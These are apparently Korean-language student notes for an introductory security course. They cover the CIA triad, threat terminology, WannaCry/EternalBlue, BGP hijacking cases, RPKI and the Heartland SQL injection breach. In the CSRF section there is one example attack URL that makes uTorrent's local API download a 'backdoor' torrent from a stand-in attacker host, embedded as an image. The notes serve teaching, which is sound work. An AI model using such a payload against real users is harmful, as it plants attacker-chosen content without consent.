Intro to Security
Table of Contents
1장 #
생각열기 #
- 세상은 초연결사회가 되가고 있으며 사물 인터넷 기술 발전으로 해킹의 공격 범위가 증가하고 있다.
- 클라우드 사용 및 가상화 발전으로 여러 회사들이 같은 장비를 공유하는 경우가 늘어나고 있다.
- 침해사고대응팀을 사용하여 개인정보도용을 줄이기 위한 노력을 해야만 한다.
구체적 사례 #
세로운 공격법 생김
인공지능…
감시 카메라 해킹
공기 해킹 -> 자전거
DolphinAttack 안들리는 주파수로 보이스 기기 제어
Facebook 해킹 이후 대처 방법 #
- 페이스북 플랫폼에 대한 검토
- 불법적으로 사용된 데이터에 대한 고지
- 사용되지 않고 있는 앱의 접근 차단
- 사용중인 앱 관리에 대한 안내
- 취약점 발견 시 포상금
State-Funded Adversary Attacks #
국가 제어망에 대한 사이버 테러
기상청 이메일 해킹 15명의 책임자 개인정보 유출
방위산업체의 해킹 다수 시도
한국항공우주산업 최신 전추기 설계도 누설
월패드 해킹으로 다크웹에 약 17만 가구의 사생활 침해
인터넷? 딥웹? 다크웹????? #
deep web: 일반 인터넷 검색 엔진으로 액세스할 수 없는 인터넷의 일부
dark web: deep web의 한 종류, 암호화됨. 불법 행위 많다.
대처 방법 #
- 개인의 IT기기에서 중요한 데이터 백업
- 백신 프로그램을 활용한 실시간 보호
- 프로그램의 최신 버전 업데이트
- 출처를 알 수 없는 URL 사용 X
- 불법 사이트 사용 X
악성코드는 네트워크를 이용해 개인 정보 유출 및 명령 수행 랜선 분리 또는 인터넷 사용 해제
악성코드 검사 프로그램 사용
악성코드 발견 시 악성코드 및 레지스트리 삭제 미발견 시 백신 업체, KrCERT/CC에 문의
감염된 하드 디스크 포맷, 백업 사용 등
다중인증 #
보안 증가
결점 #
MFA를 이용한 피로 공격
해킹 사례 1개와 사용된 기법에 대한 조사하기: 워너크라이 공격 #
워너크라이(WannaCry)란 2017년에 있었던 랜섬웨어 공격이다. 랜섬웨어(Ransomware)란 공격 대상의 파일을 암호화한 후 랜섬(Ransom)을 요구하는 공격이다. 본 공격은 EternalBlue라는 SMB 취약점을 사용하여 배포되었다.
CVE-2017-0144의 유래 #
CVE-2017-0144(EternalBlue)는 미국 국가안보국(National Security Agency, NSA)에서 개발된 취약점이다. 이 취약점은 SMBv1(Server Message Block version 1)에 있는 취약점을 악용한 것으로 망에 연결된 컴퓨터에 빠르게 접근 할 수 있었다. 취약점은 많은 보안전문가들이 취약점이 할 수 있는 것 중 제일 위험한 것이라고 부르는 Remote Code Execution을 가능하게 하며 서버 횡령(오용)을 가능하게 한다. 미국 국가안보국은 2017년 “Shadow Brokers"라는 해커 집단이 본 취약점을 탈취했다는 사실을 알게 된 후, 같은 해 3월에 Microsoft에게 제보를 늦게 했다.
워너크라이의 배포 #
2017년 5월 12일에 워너크라이가 배포되기 시작되었다. 이 공격은 빠르게 확산했으며 당시에 생소했던 비트코인으로 랜섬을 요구했다.
2장 #
생각열기 #
- 3대 요소
- 자산
- 공격, 수동적공격과 능동적공격이 있다
보안의 3요소: #
기밀성(Confidentiality), 가용성(Availability), 무결성(Integrity)
3대 요소가 모두 맞물려 포괄해야만 더 안전함
보충과 업데이트 꾸준히 해야만 함
기밀성 #
허가를 확인하는 것
인증 시스템 등 있다.
무결성: 고의적이나 부주의한 방법으로 인해 허가되지 않는 변경을 막음 #
가용성: 신속하고 정확한 서비스를 제공하야 함 #
용어 #
| 용어 | 정의 |
|---|---|
| 취약성 | 시스템을 구성하고 있는 것에 있는 약점 또는 오류 |
| 보안정책 | 시스템을 관리하기 위한 규정, 기관마다 다를 수 있음 |
| 자산 | HW, SW, 네트워크, 통신 대역폭과 같은 시스템 장치 설비 |
| 대응 | 보호하기 위한 조치 |
| 위협 | 가능한 잠재적 손실 |
| 위험 | 위협의 파괴 또는 손상시킬 가능성 |
| 공격 | 악의적인 목표를 가지고 특정 목적을 달성하기 위해 시스템에 가하는 것 |
| 수동적 공격 | 시스템에 직접인 피해를 주는 것이 아닌, 정보를 중간에서 탈취하거나 도청하여 데이터의 특성을 파악함 (수집) |
| 능동적 공격 | 시스템의 취약점을 활용하여 정보를 수정하거나 변조해 악의적인 목적을 이루기 위한 행위 (수집한 데이터 등을 직접 사용하여 공격하기) |
위협의 결과 #
비인가 노출 #
- 노출: 권한 없는 자에게 데이터 노출
- 변조: 권한이 없는 사용자로부터 이루어지는 데이터의 변경
- 침입: 권한이 없는 사용자가 악성 행위를 위해 방화벽을 우회
기만 #
- 마스커레이드: 권한이 없는 사용자가 권한이 있는 사용자인 것처럼 가장
- 부인: 행위에 대해 부정함으로써 선한 사용자를 속임
분열 #
- 무력화 시스템을 불능화하여 동작을 저하시키거나 중단
- 방해: 서비스가 정상적으로 동작하지 못하게
횡령 #
- 오용: 시스템에 의도적으로 비정상적인 행위 유발
각각의 용어에 해당하는 예시나 공격 사례를 작성하고 설명하기 #
비인가 노출 #
비인가 노출의 대표적 사례는 2006년에 노무현 전 대통령과 한명숙 전 총리의 주민등록번호가 유출되었던 사례등도 있다.
기만 #
기만은 대표적으로 CSRF (Cross Site Request Forgery)로 발생한다. 이는 사용자의 의도와 관계없이 특정 요청을 실행하게 만드는 취약점이다. CSRF 취약점의 대표적 사례로는 uTorrent (CVE-2008-6586)이다.
CVE-2008-6586는 localhost:8080에 있는 uTorrent API서버에게 GET요청만 하면 모든 액션을 할 수 있어, 유저에게 큰 위협을 끼칠 수 있었다. 예시로
http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent
와 같은 URL을 img로 내장하여 기만을 할 수 있다.
분열 #
흔히 말하는 DDoS공격이 분열을 일으키지만, 이 외에도 BGP (Border Gateway Protocol) Hijacking, ARP Spoofing 등 있다.
BGP Hijacking의 사례로 두가지를 가지고 왔다.
배경지식 #
BGP (Border Gateway Protocol)이란 인터넷을 구성하는 수많은 자율 시스템(Autonomous System, AS) 간의 경로 정보를 교환하여, 데이터 패킷이 최적의 경로를 따라 이동하도록 안내하는 통신하는 것을 규정한 것이다. 각 AS는 고유한 번호를 가지며, BGP 라우팅 테이블을 통해 연결된 다른 AS들의 네트워크 정보와 그 경로를 학습하고 관리한다.
2008년 YouTube 대상 차단 공격 #
2008년 2월, 파키스탄 정부는 ‘비이슬람적’ 콘텐츠를 포함하고 있다는 이유로 YouTube 접속을 차단하기로 결정했다. 파키스탄의 국영 통신사인 파키스탄 텔레콤(Pakistan Telecom, AS17557)은 본 명령에 따라 YouTube 차단을 시도했다. 당시 YouTube는 208.65.152.0/22라는 IP 주소 대역을 사용하고 있었지만 파키스탄 텔레콤은 YouTube의 전체 주소 공간 중 일부에 해당하는 더 작은 범위인 208.65.153.0/24를 광고하기 시작했다. 파키스탄 텔레콤은 자체 네트워크를 인터넷에 연결하기 위해 상위 ISP(Internet Service Provider)인 홍콩 기반의 PCCW Global(AS3491)을 이용하고 있었다. BGP는 “전이적 신뢰 모델"기반으로 작동하므로 PCCW Global은 파키스탄 텔레콤의 광고를 필터하지 않고 경로 정보를 전파했다.
2024년 Cloudflare, Inc. “1.1.1.1” 서비스 저하 #
2024년 6월에 AS267613는 1.1.1.1/32를 광고하기 시작했다. 그의 상위 ISP인 AS262504는 본 대역을 포함한 1.1.1.0/24를 광고하기 시작했다. 원래는 1.1.1.0/24는 유저에게 AS Path가 가장 짧은 서버와 통신하는데, AS267613이 Cloudflare, Inc. (AS13335)보다 짧은 경로를 전파하는 경우가 브라질 일부에서 발견되었다.
본 사례들로 크게 두 가지의 교훈을 얻을 수 있다.
- Invalid Origin AS와 Invalid Prefix Length인 대역의 광고를 수락하는 것
- RPKI가 유효하지 않은 광고를 수학하는 것
더 구체적으로 두 가지를 살펴볼 것이다.
Invalid Origin AS/Invalid Prefix Length #
Invalid Origin AS란 어떤 AS가 할당받지 않은 대역을 광고 받았을 때 나오는 경고이다. Invalid Prefix Length란 대역 크기가 일정 크기(일반적으로 255.255.255.0 (CIDR /24))보다 작은 대역을 광고 받았을 때 나오는 경고이다.
일반적으로 대부분의 AS는 이러한 경고가 있는 대역은 거부한다. 하지만, 2024년에 있었던 “1.1.1.1” 서비스 저하로 아직도 차단하지 않는 ISP가 있는 것을 확인 할 수 있다.
RPKI (Resource Public Key Infrastructure) #
이러한 BGP Hijacking 공격을 막기 위한 노력으로 RPKI (Resource Public Key Infrastructure)가 도입되었다. 대륙 인터넷 관리사무소에세 발급하는 인증서를 사용하여 ROA(Route Origin Authorizations)을 만들게 된다.
RPKI를 도입 안한 AS들이 아직 많이 남아있다. 예를 들어 SK Broadband (AS9318), SK Telecom (AS9644) 등을 실험한 결과, 아직 RPKI 인증을 안한다는 사실을 알게 되었다.
횡령 #
횡령의 대표적 사건은 워너크라이, Heartland Payment Systems, Inc.의 2009년 해킹 사건이 있다.
Heartland Payment Systems, Inc.의 해킹 사건은 SQL injection의 사례로, MSSQL에 있는 명령어인 xp_cmdshell을 악용한 사례이며, 이를 통하여 RCE를 취득할 수 있었다.
Heartland Payment Systems, Inc.은 미국의 신용카드 결제처리시스템으로, 한국의 토스와 같은 역할을 한다. 당시에 이 업무에는 제일 많이 쓰였던 시스템이다.
RCE를 취득한 후, 몇 달 동안 감지 안 되었으며 이 기간동안 결제망으로 넘어갈 수 있었다. 이렇게 넘어간 후, 카드 정보를 얻기 시작할 수 있었다.
VISA와 미국 연방수사국의 조사를 받은 후에 이 공격에 대하여 알게 되었으며, 회사는 손해배상 등을 치루었다.